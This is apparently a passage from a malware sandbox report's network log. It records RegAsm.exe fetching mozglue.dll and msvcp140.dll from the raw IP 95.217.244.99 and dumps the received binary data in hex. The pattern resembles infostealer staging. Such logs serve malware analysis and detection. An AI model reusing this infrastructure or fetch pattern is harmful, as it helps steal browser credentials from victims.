85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
2024-04-23 19:44:10 UTC	16384	IN	Data Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff Data Ascii: 0<48%8A)$(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49718	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:11 UTC	157	OUT	GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Cache-Control: no-cache
2024-04-23 19:44:12 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:12 GMT Content-Type: application/octet-stream Content-Length: 608080 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-94750" Accept-Ranges: bytes
2024-04-23 19:44:12 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-04-23 19:44:12 UTC	16384	IN	Data Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46 Data Ascii: A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNPFLFPF
2024-04-23 19:44:12 UTC	16384	IN	Data Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1 Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
2024-04-23 19:44:12 UTC	16384	IN	Data Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}LQ
2024-04-23 19:44:12 UTC	16384	IN	Data Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07 Data Ascii: 1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
2024-04-23 19:44:13 UTC	16384	IN	Data Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
2024-04-23 19:44:13 UTC	16384	IN	Data Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4\|$
2024-04-23 19:44:13 UTC	16384	IN	Data Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$\|$K$S
2024-04-23 19:44:13 UTC	16384	IN	Data Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
2024-04-23 19:44:13 UTC	16384	IN	Data Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49721	95.217.244.99	443	2632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 19:44:14 UTC	158	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.244.99 Cache-Control: no-cache
2024-04-23 19:44:14 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Apr 2024 19:44:14 GMT Content-Type: application/octet-stream Content-Length: 450024 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-6dde8" Accept-Ranges: bytes
2024-04-23 19:44:14 UTC	16138	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-04-23 19:44:14 UTC	16384	IN	Data Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
2024-04-23 19:44:15 UTC	16384	IN	Data Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00 Data Ascii: {\|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
2024-04-23 19:44:15 UTC	16384	IN	Data Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1 Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]ED{I
2024-04-23 19:44:15 UTC	16384	IN	Data Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
2024-04-23 19:44:15 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8 Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
2024-04-23 19:44:15 UTC	16384	IN	Data Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89 Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
